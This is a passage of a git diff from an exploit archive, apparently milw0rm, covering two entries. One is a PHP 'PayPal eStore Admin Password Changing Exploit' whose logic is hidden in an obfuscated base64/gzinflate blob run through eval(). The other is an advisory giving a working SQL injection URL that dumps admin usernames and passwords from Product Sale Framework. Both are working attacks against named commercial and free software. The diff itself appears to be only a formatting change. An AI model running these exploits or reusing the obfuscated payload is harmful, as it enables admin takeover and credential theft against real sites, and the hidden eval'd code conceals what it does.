+                 "DDg21qV5slOddO8CFsuw891pBjZXSNJWoWuUWFlGNgd+7UQnKPI04KwcJU3kFE6HQVd/20Smp5Xg".
+                 "7wot4zxQcQ4+S+k46b9jLxje47QypChPfNf4jXmtDmEd3QWsFaFbJ8bCZOi1utf1svfKfJ3GTbiA".
+                 "bw8MfM+8LMyy2LtOhVUjD9VBZsBrGfbQE+GEau+a0coTJ0gylhBREKU2yCyFh+8kscJumAeFGb02".
+                 "zIvk4pr6O+ScEnMxswbcAsWkugzrFrjEbptRPyPVqXRJfJC19x71WC2qKHDljvpxnc6fkSrGWLHK".
+                 "oCDDOyW/UPtCNa/wrjwH3DRfgx5vJvOCizwPFAswM+m8Hg+fa3Mf5PqFwOwX/VqwpsHo3uD/dTGF".
+                 "HLH7uUSRM6xA/FyO7UoVJ1e5H+wvg4PIjvgV4IM4XJSACWb+WQ85Aft7+SGXZ6ESPa12ZkPUaPRX".
+                 "W/ue+RQoThEO+jHYixndlcEf4Xl90AZcKdbeOxYnUuSHvWo+rfibnpDnHFJPD3GyPoTHvWfla4hX".
+                 "UoRlkJZx6Fn1mtMgz62cpMfUSH2OXmghN6+SeAm4tsSLEw9xDZgd+dVCbF4XJ4HWAJ0fcOtzCHIZ".
+                 "u3LW/1ZovmR9nQAMOaQYFc3NzVbLwgTdxse8g/FHOwsjp7WDpFWySduGFDb9RtjsmL9xGVIyj5D0".
+                 "1SW+XX973eex/pJnD+O3eR+uOfPy9TrzSO9E0v+GuvU2jr1J4uxuTo3k5jZ+N+/jBfh9Y9MMdBzW".
+                 "uskf5N3p8jasRcfbtw963F/f4Qf6Cm/DWoMcj50N9vXjoy6sMKxF15eH99/ht7UnkbOMZbScijvb".
+                 "jnaMH+nsrO6xlwUyrAPy+XEd+A041V5H/SQSj+3HR7v+C34/ev0h/n7wAvz+Uk4Jf8Kv90835s41".
+                 "f/r7mFvv8UGfxbcvc+qP+A3xNeRLO8Y4/Jaba+zXdF1vzAW9m9ff4fdNnZjdx+9bH+NjLMvtmKvi".
+                 "7S4RyLGv9f4WP/Uav0N893jyg1zvvTaMOQtz9GSsK/8Gv6UzIUpb72H/Mg8Z1f2aP72NdJ3r3aM6".
+                 "9PkkvFFbqE59/kn/rf795PVX948f4Kp/Vd+0qYmq5Ru4032Z7uFb2TJ2lIMklrJjNWOz7fsbxcp8".
+                 "yvkz4PiR7wI34CYCuu7X1729ELpgK468DLj+yHWMnd1zHZSIsQ/8O6DfHqrMYw3ZzjFc1cFexiZ9".
+                 "3i39g+cxCVJY4MFxjaFnIIoAfI+uUQJ+1hFBD7GGPoFwRrf3REanvGjX3vgZ7U+ibAZ86oCB/wCX".
+                 "SDYJPvsHo1kzdgT8pkFKEwWdWCLVLIJCu5AF9AYc+gV85sptfwGf6aBuUNu0DfBWkFPtd5PZwOea".
+                 "iNoLHIYFHvZmMVMdpVMUADdaA57jnOFb4JNEpdz3nfe8c90HviXNexa25sMSq9ZxnS75noN2KAJe".
+                 "Dpg53d4R1F1WAT7TOHDtx7HHPgaecRyoDqyHkk2vUzbq05bUFt/VcugDi4BH8I1Yk4M12jEZMTmZ".
+                 "oOcP2mNe46Ac/dqF8kd77vRIRObVE995IjxzEHssja31Yv5vbIohhj7ZRGPo52wiH2ySmf1nm256".
+                 "fGOT3g3xBzE2xm8GMdjGfuFUSME1SZkkOIRNyH3y0xp75GQr8oXwIXB684nK6bEYc2HvTpsQajnh".
+                 "rWlAY6R45/5Dv6fSXjLPoO8D+1bP77l7obyf2pJnoPM55EUef7SvmPJEDTOPCddbiNWQ9v27a68P".
+                 "z4VchXRe0tvHgk6Qa72/EjL2+9IOatCtZ3rPvYccvPpo0OUQsB/1COuPOhDeSQI3f8DZdI3+jAVt".
+                 "0T/J7bAHNeSTD7Wc9q+f5BcO1fcu17Rt/z3UqzvdwV7wX8FQ+2kN7cf8A4r0y+R67+vxtQ5b0IXS".
+                 "nm7v+tEL9Lt07RfJerOXws6RqwPmhD4GNJYpkeQX6POcJPS0ctBXC1+280JL5jF22SZUs6MmC+aO".
+                 "NWy3u6tf+dey7uPa22aRlvgRcp0TgZrzzTyor1VGIKcQ7IUoF+NXR4yDBXvy3bzSi7Lec858Xwi/".
+                 "8Xb6vz1nF1tPPO9cIQNsOy1roc89wd44F4wOw/4YnrCnpfsF02rZNA8ZOQPfnjfucO/HWDEm/KqF".
+                 "mne+s/Ehbr3tJLmb2/1x7gHkOU6DwTa8tbuVTM9OaA8eXlBaZT4Xw35hHAOuijb9/qfBHjI5air8".
+                 "lrJnTaF22vBunvQ4SfNET77CbAK9u3Xau5Ma7m/UDyE9j+BXZ6LEzYZra/A9G0oicmTL1C/L88pp".
+                 "O08Z957kUfZ9DOiJRkjenh2IT5KwIubomdwxAryf9i7Uzu2M1dN59CKHYJtVh/zqGck2XO/P0S43".
+                 "IwM4zboT8yBhHftSReTgPwHPmb5sRRW7xu+gm3WrxXyyWtjdejfn0BKXkCdQk6N61U0aT9VIkJ1y".
+                 "7M1PJnCJsLChxq6aldzbsQi46RmPObpOxN/YdZr+jMDD+fDthzPG3THyPbEJ6LmZ1/OL+lVi+ZAn".
+                 "p4GTsBDjLfUR5JeTfZSxUxzAF2r5gF26h2fwab3vJkk/N6d6TZJ1Z/0v4E45koC/SFZDePOMbu+g".
+                 "bqx6H/cx4VkMPYOhcY8PRu1zp5qA3K/yU3/Iodu+6G0b2IO0LihmFayZk4MG8YUqtLCbl92pxEkU".
+                 "axA/oSKn+y5/xv2ZdJTc6if6FXJxDPESkwK4j7uMsCLQ86OznkxitBhrcG6wAeyLsE8ckBpSXKKQ".
+                 "Bz77Pq+p/XTysWZBXbPKMJ0koAvYbwHOk+c31wEMZ0c08sXrnuNJWgG+Zeh5GynYOJDmE6LCOuNZ".
+                 "6pq/nW0NZ2FHtuc/bJNs8uq3B1zUT2/xgV2T6kZ1qSkXgHfBC8tE1GYbYrs/x+vEjp5NY3rel0zO".
+                 "FJdBb/QLJdkzPoQdPRsDv8SQ07HPVdWYryXs8YBHC+/kArtCcTenfPGgrkHt11O2gDxiSBe9+xyw".
+                 "EHBhVJCP93LLNZcXSIppfSgBkw7e0ZihZ8WX0DVS0PGCD04VqFnysr36cp643SmkNt16MisHHvLB".
+                 "JzfbN0p/HkvP3SvKgwD3DrsWAX7a3PUf6dB/OFmPiyT0fKo/O158lrkrHJ6ewxLe4CkvonsEgtqB".
+                 "kgnweHFjs1bwyANovUEDzu8xBj7cUS5O/dz3Q43vToGjHK/z6P8JoKtPdT4Cbs06mdUPa9zxXaiV".
+                 "d+N3HCtnzqgY9gSdxk4i/oysC+C9+5wD//ZOIL7B5rE/Ygkqej89BbRGQX1Di7iBPIUYiuvAXT6P".
+                 "/ntC9Gz/cqL+u/2nsdSmaEmYXSrqo/8usI+c3znV+33kFAl6fttCzYb+CPbk6HNsCdALriIdembC".
+                 "g2wJ+vtFy24gV0EnN3TbM9Qh4KLAjYHDbZL5GepgpAOnGGLnm3VdXIWecXyBvRCpUA/d9oK34jP0".
+                 "cbRORNoSb+yMeabn1/8H";
+                 eval(base64_decode(gzinflate(base64_decode($G4N0K))));
+?>
+
+# milw0rm.com [2008-12-07]
diff --git a/platforms/php/webapps/7367.php b/platforms/php/webapps/7367.php
index 4d6331acb..a1be0d757 100755
--- a/platforms/php/webapps/7367.php
+++ b/platforms/php/webapps/7367.php
@@ -1,104 +1,104 @@
-<?php
-/*
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	PayPal eStore Admin Password Changing Exploit
-==============================================================================
-
-	[»] Script:             [ PayPal eStore ]
-	[»] Language:           [ PHP ]
-	[»] homepage:           [ http://www.webberco.com/ ]
-	[»] Type:               [ Commercial ]
-	[»] found-report:       [ 26.11.2008-02.12.2008 ]
-	[»] Founder.coder:      [ G4N0K <mail.ganok[at]gmail.com> ]
-
-===[ LIVE ]===
-
-	[»] removed...
-
-
-	
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 <Tornado2800[at]gmail.com>
-	[»] B13
-	[»] AFSHIN-ZARBAT <afshin.zarbat[at]yahoo.com>
-	[»] QU1E <evilinhell87[at]yahoo.com>
-	[»] Hussain-X <darkangel_g85[at]yahoo.com>
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-*/
-
-error_reporting(E_ALL);
-		$G4N0K = "vVlJl6LKEv5BtXgMWiWLtwAUSApRkTF3DFXMymkVxF9/IxO0tOp19T39+vQiD5JkRsYcX6TYM/dR".
-		"L87W8zNyF+xyvtnPkGOtN6yFnYWThpp1jGRp4zr6cussU5QzrcHGl00/ay3FWiAlo/vQfHFaypIT".
-		"18op5iom9IRT4HWtwbgrlIs50GHi+b41+IRP+im/7KdtXMetq6D2Tc2YyOvOBmM5lixM6JnzxTHR".
-		"9CzamU2iVm1UKwejthgsoyfC48jXJPLOp/jC/JT+0i6nq+1I87pXdTM8n5hycT5i38oQnJ9oIvxW".
-		"2NAPBFSabbSzqmi3Obpa1eEtSgNOOCWqe0rmTA7PSSIL+0RlD6teKkJV6WPOZdau61g5MwF523XK".
-		"vK41C3g/V+tKyt5cKQN+K4e3gC8n3XjWMfQmqaMql5hPYG6Tbrgsi+qkieo4tfysi1ShSWRphhYx".
-		"YxeSsZYFJvStA7Yp75dEqw54KzFvvlSttzqD/YwxOPMS90TOJo84a/rWMa+yh1siC64VOPM8XVVW".
-		"FqrCMdh2KSrPbMBVZbCVNGI7rDq5IYu5rblF6IFuFBNssExdb9qADkrQxQEpuIprC3hdHNBC6UMP".
-		"bCNLCHtnDvQJ62Beo/uOoBf4HryA3vWgVoqQS/qId09YZouIO7dxsS82jDknY3XHK/jQM7b3k1jb".
-		"wN5GgP2mDDrFdVVFqnWBc0aaQo9Vt1/twGZqVaK50r3JYmEt3AV4k0Jovm/u923SSHV32JuWSDsA".
-		"zaqOuClj+EkVesk+mRO9nUuybzi3qUPPPWDNrMAWbCR36SOt6pGPQnxBKpvFxI7FvgP/6ALPKkNv".
-		"uhu+nZuYB/l4axqpznNUCydsAx87xpRr3IAOS+JLZN1gO/OAPaVf1XqbqCk9C868JDI72N9uTsB/".
-		"RXXnSxlWLeI/z0tb6t7mI930UX7gpUtG/eH63Ab+5hl0Uifz/8lHFtTugfLiJw3WrP2qWDBLTZqM".
-		"9jpEnMKs6nOFdxtKc4gPNgM+d1HR9INeqa5vujB8vcFcxqwK84PPfFomufTy4Cfzhg/VisH28Rj4".
-		"+g5i5jnwXSa6HPOI10vso2d0CTizgJGL51hL05gTDqG3eUnAr0Fnz+ZF7GD+hfgBxNCoNxJDXXuX".
-		"C2i80LgFHQIfRURiE3IL1oL8bn7cf80DNzkL8CmIQfSCisks1vSK7rEZ4W8M0HuKZPGnw+/H38rs".
-		"6xwd0vvD/N26TwPsJH5z1iz1B3ozpHXDHDzf79YYvRR/zN+t+zxE5vUbmVrCo/+JPqV3z8t4Fpn3".
-		"+Uc+7sd3+gN+3312OIvSYYX3Qb4znR94Ed6Hs8j50vD9O/0tqhVSLGRtpdXGYRW0EFQkC+8G1T3Q".
-		"Hc+BMZ4Dv4F/g5211EaKEJP5q1y/ob8/On7lf39wQKz+nZhab36hP2Jzan9q7/f7OBpiS7r6B32/".
-		"/v4N/Q3+xQ/xcvVxeMZX3yc+ipRujIVZavTib8Xv+73/amfqe6NPx9dY/XiKOxJjP+X7W/8b4uf9".
-		"GkfU74WB7k2Oa8yS8ydjXvk3+pOUN02CulQxaKFPCe/X+KEyknOuT4XwQOMJeABZCE80/sTfzH9/".
-		"cIh/s340m8CvNoDZU+yaDNTWCrBdGXnVCSlSFvMmT+otWpj7AOo3qeFo4U5i9dyG/uavxiTU8A4w".
-		"9BM8S8DrBOvSHoTgEX2B107JCGjezdYLQEMfdXus00wecC7B8j3UaVL3a5DrCHiVefPOBEfzgHuZ".
-		"cL5nzQFD5UhVCtqDwN633np3GHfrlu7W65PNVpHI+9LKk+Qd+oTIcxnA1iXQ6SLeZOgZgP8Bh6TY".
-		"T58hx18CXm8A17YEK63VD6xF8IJsnwHvJVVUb57WKnrS62ke8+IL1IkJ0sQUeogWqWWayPgU7Mxu".
-		"denaAPCGwQH+4ghemsyCHUqNC5yblrPE64DOuVkX50Pg6RXsB3mRgHaAy11Bs8tDvi6zFjDpM+hz".
-		"WDMf9g44cZOOWFVAgEEB91eA2dOlT/gZMbdM0NfyhreWdkzxFsqlBpN+CbCezySrbQ/6gR6EYqe7".
-		"uYT0WDc8Be/Q6yUenJcjYuNDaA/8RGpJZKF4FKkYegcmj1WhT5RRjnzUCSu18e7PyWPOr35QjXbV".
-		"mc/y3POBNGsaE/rQQ75pG3jHWaS54FtospT/jUwKE36VifjQn5Pp8ihT4Fv7rzJ98PGNTC0a/K+5".
-		"+i/IBnIpOSa5BPoioH9KeInHn2ViplXSs5B3zEvCQf803xM6VBcjrSbaSSz0XTfMfeuzHrF+ikgH".
-		"cDleY5en/QnIAt9AJ1M+1pLys3zRLukSznq3mKkBvvrQR8M7F3hnlqyj8vHAE/QLg730HureE41f".
-		"WfjoDz9i7yEGrzYaeEnaz3xgTvjMwyXx9CPk1Ts961LAQ2/HTTKaUz7T3ekVySFfbFi7pFf+TL/H".
-		"Puln72KtGvYTWW+8g7zEfpFN7As5dMiXeUzuN67PlObjax5WrZL0+k2Dc3Efgl2h39zrirCxWdOB".
-		"fLmLWOoDO39bpnoepF/X6GxcVwO/FdMgOaiRrFSRD7xv09JnpbXDWtF9/vqG1p1f68nrVqz1XMyw".
-		"x3aJVn6zrkwhz3eQE9P1Vszt2uXH+xohGJ41maN3N5cF5KnJB18PvqYnRo7u1qJfriX0XF8qgZ9K".
-		"t1HngE2g9pwwv8xXvVVAv3oKuKwNe1EgNSuGvjvK0zKG36/2oQxr4QfewjdZp7IhGZ1+JqeR6xlW".
-		"2SbKBeIjDKnpcT/tQk38T6QKO+i/AT9ljquI7XI7OfuaHkdjrfhE995mJ1Sde1+duuTux3AUctfC".
-		"rHLJjPimiSDXGRfntJTFvcuBXKrAx5dD6towru+9tHJlkTWKxQsCeQ3XtVe91CfF/mwUZYMWSRVw".
-		"x9a4oG45TzvTRtPlPEituuqxh9s3eXYxCimOq/Npy7lVLLMS5EAO25ATL2I3yAF5sZ5WY0w9I/VY".
-		"YV88Qsw3Se3SvZvrnZ/MOiRuQIYsBlwZemZG8UAuTAyf3DeyFEMYvttH1D5CiT3rM40l6GFHci/V".
-		"nWru4R3sKfwAO9C1lK8cvehq04ackxoFk+oa5D55kt++aRCnxPYyIv6QJZqVBdwB/FSqIRcWISd0".
-		"2Jv8LJ4O977wUcfAF2SoGTv9FPVdqkN+jXfgW3mXmrbYrLiqfpUXxCeZwDN/vPrHivjgq4w+8l0x".
-		"5UOoF4CVeryVpsFWKiNiz35yMvJFes2ZDu8eEzWjd5wJwWGyxMfkDuy6Thby9eccQ/IQ2G+do2YF".
-		"uDTRQM/FUcD07jrNH+9l2BjV9A6R3K31kacc0Dzr4BzgPWsjb/ECda3EJKZ6FrAWZlaFQ/GKD7XZ".
-		"648Jmp8BE938o8Iy8EZ5mT1R/qrDD38rEpltco9IsTCxiw++xm9ADppDKd+AzfJX+1gngPkS1dnr".
-		"oKME8GTYd2OsllCTQR/wDXm4irjgbk3ZQB6CXL08rT28gxi9vMo3m4Mu2Dogd6jcPd3yJfSC9JXm".
-		"hgp0gvaDz0DvszPZgDOBR7NOvPPhbYuaqy0hX0SvLAMyTT7unlUXcMMnm9xkn8ygNhD7jfe4oHeo".
-		"QVjp8vXurl9Qh34Be4NeDI7iH3rn+pXmdIX9OI3v7sRDf5lCrc+NHHD3QrBd5fBYt0m+GfR88zFi".
-		"Q4KdwReH/kUD7A+YYnVbt0hD0AkmPNf07v/Z6GcPZ3zgU5InP+bvMZG/neRjPWiJ74z/I/zftEA/".
-		"2dcY+NfPC9A93foZt8upnebNieQo0t+tNIkBPDf8B2AfH+7hVyzYr7z1delmV6bWxVotF4fBfrzZ".
-		"Bd7khoFuzxEDIIhLyNkH8EmoodIX37IhP0H+OkBPfomBtgF97lpzniBWGaRgNlKnVVwrOcQDnOU8".
-		"kb7fyMUT+OHgO9+ci+szG3PpHupg+r6VqggwGdIO6ZAnxNIqha1tH8ld6X//AQ==";
-		eval(base64_decode(gzinflate(base64_decode($G4N0K))));
-?>
-
-# milw0rm.com [2008-12-07]
+<?php
+/*
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	PayPal eStore Admin Password Changing Exploit
+==============================================================================
+
+	[»] Script:             [ PayPal eStore ]
+	[»] Language:           [ PHP ]
+	[»] homepage:           [ http://www.webberco.com/ ]
+	[»] Type:               [ Commercial ]
+	[»] found-report:       [ 26.11.2008-02.12.2008 ]
+	[»] Founder.coder:      [ G4N0K <mail.ganok[at]gmail.com> ]
+
+===[ LIVE ]===
+
+	[»] removed...
+
+
+	
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 <Tornado2800[at]gmail.com>
+	[»] B13
+	[»] AFSHIN-ZARBAT <afshin.zarbat[at]yahoo.com>
+	[»] QU1E <evilinhell87[at]yahoo.com>
+	[»] Hussain-X <darkangel_g85[at]yahoo.com>
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+*/
+
+error_reporting(E_ALL);
+		$G4N0K = "vVlJl6LKEv5BtXgMWiWLtwAUSApRkTF3DFXMymkVxF9/IxO0tOp19T39+vQiD5JkRsYcX6TYM/dR".
+		"L87W8zNyF+xyvtnPkGOtN6yFnYWThpp1jGRp4zr6cussU5QzrcHGl00/ay3FWiAlo/vQfHFaypIT".
+		"18op5iom9IRT4HWtwbgrlIs50GHi+b41+IRP+im/7KdtXMetq6D2Tc2YyOvOBmM5lixM6JnzxTHR".
+		"9CzamU2iVm1UKwejthgsoyfC48jXJPLOp/jC/JT+0i6nq+1I87pXdTM8n5hycT5i38oQnJ9oIvxW".
+		"2NAPBFSabbSzqmi3Obpa1eEtSgNOOCWqe0rmTA7PSSIL+0RlD6teKkJV6WPOZdau61g5MwF523XK".
+		"vK41C3g/V+tKyt5cKQN+K4e3gC8n3XjWMfQmqaMql5hPYG6Tbrgsi+qkieo4tfysi1ShSWRphhYx".
+		"YxeSsZYFJvStA7Yp75dEqw54KzFvvlSttzqD/YwxOPMS90TOJo84a/rWMa+yh1siC64VOPM8XVVW".
+		"FqrCMdh2KSrPbMBVZbCVNGI7rDq5IYu5rblF6IFuFBNssExdb9qADkrQxQEpuIprC3hdHNBC6UMP".
+		"bCNLCHtnDvQJ62Beo/uOoBf4HryA3vWgVoqQS/qId09YZouIO7dxsS82jDknY3XHK/jQM7b3k1jb".
+		"wN5GgP2mDDrFdVVFqnWBc0aaQo9Vt1/twGZqVaK50r3JYmEt3AV4k0Jovm/u923SSHV32JuWSDsA".
+		"zaqOuClj+EkVesk+mRO9nUuybzi3qUPPPWDNrMAWbCR36SOt6pGPQnxBKpvFxI7FvgP/6ALPKkNv".
+		"uhu+nZuYB/l4axqpznNUCydsAx87xpRr3IAOS+JLZN1gO/OAPaVf1XqbqCk9C868JDI72N9uTsB/".
+		"RXXnSxlWLeI/z0tb6t7mI930UX7gpUtG/eH63Ab+5hl0Uifz/8lHFtTugfLiJw3WrP2qWDBLTZqM".
+		"9jpEnMKs6nOFdxtKc4gPNgM+d1HR9INeqa5vujB8vcFcxqwK84PPfFomufTy4Cfzhg/VisH28Rj4".
+		"+g5i5jnwXSa6HPOI10vso2d0CTizgJGL51hL05gTDqG3eUnAr0Fnz+ZF7GD+hfgBxNCoNxJDXXuX".
+		"C2i80LgFHQIfRURiE3IL1oL8bn7cf80DNzkL8CmIQfSCisks1vSK7rEZ4W8M0HuKZPGnw+/H38rs".
+		"6xwd0vvD/N26TwPsJH5z1iz1B3ozpHXDHDzf79YYvRR/zN+t+zxE5vUbmVrCo/+JPqV3z8t4Fpn3".
+		"+Uc+7sd3+gN+3312OIvSYYX3Qb4znR94Ed6Hs8j50vD9O/0tqhVSLGRtpdXGYRW0EFQkC+8G1T3Q".
+		"Hc+BMZ4Dv4F/g5211EaKEJP5q1y/ob8/On7lf39wQKz+nZhab36hP2Jzan9q7/f7OBpiS7r6B32/".
+		"/v4N/Q3+xQ/xcvVxeMZX3yc+ipRujIVZavTib8Xv+73/amfqe6NPx9dY/XiKOxJjP+X7W/8b4uf9".
+		"GkfU74WB7k2Oa8yS8ydjXvk3+pOUN02CulQxaKFPCe/X+KEyknOuT4XwQOMJeABZCE80/sTfzH9/".
+		"cIh/s340m8CvNoDZU+yaDNTWCrBdGXnVCSlSFvMmT+otWpj7AOo3qeFo4U5i9dyG/uavxiTU8A4w".
+		"9BM8S8DrBOvSHoTgEX2B107JCGjezdYLQEMfdXus00wecC7B8j3UaVL3a5DrCHiVefPOBEfzgHuZ".
+		"cL5nzQFD5UhVCtqDwN633np3GHfrlu7W65PNVpHI+9LKk+Qd+oTIcxnA1iXQ6SLeZOgZgP8Bh6TY".
+		"T58hx18CXm8A17YEK63VD6xF8IJsnwHvJVVUb57WKnrS62ke8+IL1IkJ0sQUeogWqWWayPgU7Mxu".
+		"denaAPCGwQH+4ghemsyCHUqNC5yblrPE64DOuVkX50Pg6RXsB3mRgHaAy11Bs8tDvi6zFjDpM+hz".
+		"WDMf9g44cZOOWFVAgEEB91eA2dOlT/gZMbdM0NfyhreWdkzxFsqlBpN+CbCezySrbQ/6gR6EYqe7".
+		"uYT0WDc8Be/Q6yUenJcjYuNDaA/8RGpJZKF4FKkYegcmj1WhT5RRjnzUCSu18e7PyWPOr35QjXbV".
+		"mc/y3POBNGsaE/rQQ75pG3jHWaS54FtospT/jUwKE36VifjQn5Pp8ihT4Fv7rzJ98PGNTC0a/K+5".
+		"+i/IBnIpOSa5BPoioH9KeInHn2ViplXSs5B3zEvCQf803xM6VBcjrSbaSSz0XTfMfeuzHrF+ikgH".
+		"cDleY5en/QnIAt9AJ1M+1pLys3zRLukSznq3mKkBvvrQR8M7F3hnlqyj8vHAE/QLg730HureE41f".
+		"WfjoDz9i7yEGrzYaeEnaz3xgTvjMwyXx9CPk1Ts961LAQ2/HTTKaUz7T3ekVySFfbFi7pFf+TL/H".
+		"Puln72KtGvYTWW+8g7zEfpFN7As5dMiXeUzuN67PlObjax5WrZL0+k2Dc3Efgl2h39zrirCxWdOB".
+		"fLmLWOoDO39bpnoepF/X6GxcVwO/FdMgOaiRrFSRD7xv09JnpbXDWtF9/vqG1p1f68nrVqz1XMyw".
+		"x3aJVn6zrkwhz3eQE9P1Vszt2uXH+xohGJ41maN3N5cF5KnJB18PvqYnRo7u1qJfriX0XF8qgZ9K".
+		"t1HngE2g9pwwv8xXvVVAv3oKuKwNe1EgNSuGvjvK0zKG36/2oQxr4QfewjdZp7IhGZ1+JqeR6xlW".
+		"2SbKBeIjDKnpcT/tQk38T6QKO+i/AT9ljquI7XI7OfuaHkdjrfhE995mJ1Sde1+duuTux3AUctfC".
+		"rHLJjPimiSDXGRfntJTFvcuBXKrAx5dD6towru+9tHJlkTWKxQsCeQ3XtVe91CfF/mwUZYMWSRVw".
+		"x9a4oG45TzvTRtPlPEituuqxh9s3eXYxCimOq/Npy7lVLLMS5EAO25ATL2I3yAF5sZ5WY0w9I/VY".
+		"YV88Qsw3Se3SvZvrnZ/MOiRuQIYsBlwZemZG8UAuTAyf3DeyFEMYvttH1D5CiT3rM40l6GFHci/V".
+		"nWru4R3sKfwAO9C1lK8cvehq04ackxoFk+oa5D55kt++aRCnxPYyIv6QJZqVBdwB/FSqIRcWISd0".
+		"2Jv8LJ4O977wUcfAF2SoGTv9FPVdqkN+jXfgW3mXmrbYrLiqfpUXxCeZwDN/vPrHivjgq4w+8l0x".
+		"5UOoF4CVeryVpsFWKiNiz35yMvJFes2ZDu8eEzWjd5wJwWGyxMfkDuy6Thby9eccQ/IQ2G+do2YF".
+		"uDTRQM/FUcD07jrNH+9l2BjV9A6R3K31kacc0Dzr4BzgPWsjb/ECda3EJKZ6FrAWZlaFQ/GKD7XZ".
+		"648Jmp8BE938o8Iy8EZ5mT1R/qrDD38rEpltco9IsTCxiw++xm9ADppDKd+AzfJX+1gngPkS1dnr".
+		"oKME8GTYd2OsllCTQR/wDXm4irjgbk3ZQB6CXL08rT28gxi9vMo3m4Mu2Dogd6jcPd3yJfSC9JXm".
+		"hgp0gvaDz0DvszPZgDOBR7NOvPPhbYuaqy0hX0SvLAMyTT7unlUXcMMnm9xkn8ygNhD7jfe4oHeo".
+		"QVjp8vXurl9Qh34Be4NeDI7iH3rn+pXmdIX9OI3v7sRDf5lCrc+NHHD3QrBd5fBYt0m+GfR88zFi".
+		"Q4KdwReH/kUD7A+YYnVbt0hD0AkmPNf07v/Z6GcPZ3zgU5InP+bvMZG/neRjPWiJ74z/I/zftEA/".
+		"2dcY+NfPC9A93foZt8upnebNieQo0t+tNIkBPDf8B2AfH+7hVyzYr7z1delmV6bWxVotF4fBfrzZ".
+		"Bd7khoFuzxEDIIhLyNkH8EmoodIX37IhP0H+OkBPfomBtgF97lpzniBWGaRgNlKnVVwrOcQDnOU8".
+		"kb7fyMUT+OHgO9+ci+szG3PpHupg+r6VqggwGdIO6ZAnxNIqha1tH8ld6X//AQ==";
+		eval(base64_decode(gzinflate(base64_decode($G4N0K))));
+?>
+
+# milw0rm.com [2008-12-07]
diff --git a/platforms/php/webapps/7368.txt b/platforms/php/webapps/7368.txt
index bc7a2b6ce..efafd2f15 100755
--- a/platforms/php/webapps/7368.txt
+++ b/platforms/php/webapps/7368.txt
@@ -1,52 +1,52 @@
-        +++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++
-        +                                                                    +
-        +         Product Sale Framework sql injection Vulnerability         +
-        +                                                                    +
-        +                      Discovered by b3hz4d                          +
-        +                                                                    +
-        +                      WwW.DeltaHacking.Net                          +
-        +                                                                    +
-        +                                                                    +
-        +                                                                    +
-        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-                                  
-
-                              APA Center of Yazd University   
-                                 (https://www.ircert.cc)    
-
-		
-AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
-DATE   : 06 Dec 2008
-SITE   : WwW.DeltaHacking.Net
-CONTACT: behzad_sh_66@yahoo.com
-
-#####################################################
-
-APPLICATION   : Product Sale Framework v0.1 beta
-DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip
-VENDOR        : http://www.productsaleframework.com
-DEMO (links)  : http://www.productsaleframework.com
-
-#####################################################
-
-
-[+] vuln    : 
-              customer.forumtopic.php
-              
-              vulnerability is in froum.all demo link(Admin demo,Affiliate demo,Customer demo) is here:
-             
-              http://www.productsaleframework.com/
-
-[+] Exploit : 
-              Admin Username and Password:
-
-              http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb
-    
-               
-##########################################################################################################
-
-# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #
-
-##########################################################################################################
-
-# milw0rm.com [2008-12-07]
+        +++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++
+        +                                                                    +
+        +         Product Sale Framework sql injection Vulnerability         +
+        +                                                                    +
+        +                      Discovered by b3hz4d                          +
+        +                                                                    +
+        +                      WwW.DeltaHacking.Net                          +
+        +                                                                    +
+        +                                                                    +
+        +                                                                    +
+        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                  
+
+                              APA Center of Yazd University   
+                                 (https://www.ircert.cc)    
+
+		
+AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
+DATE   : 06 Dec 2008
+SITE   : WwW.DeltaHacking.Net
+CONTACT: behzad_sh_66@yahoo.com
+
+#####################################################
+
+APPLICATION   : Product Sale Framework v0.1 beta
+DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip
+VENDOR        : http://www.productsaleframework.com
+DEMO (links)  : http://www.productsaleframework.com
+
+#####################################################
+
+
+[+] vuln    : 
+              customer.forumtopic.php
+              
+              vulnerability is in froum.all demo link(Admin demo,Affiliate demo,Customer demo) is here:
+             
+              http://www.productsaleframework.com/
+
+[+] Exploit : 
+              Admin Username and Password:
+
+              http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb
+    
+               
+##########################################################################################################
+
+# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #
+
+##########################################################################################################
+
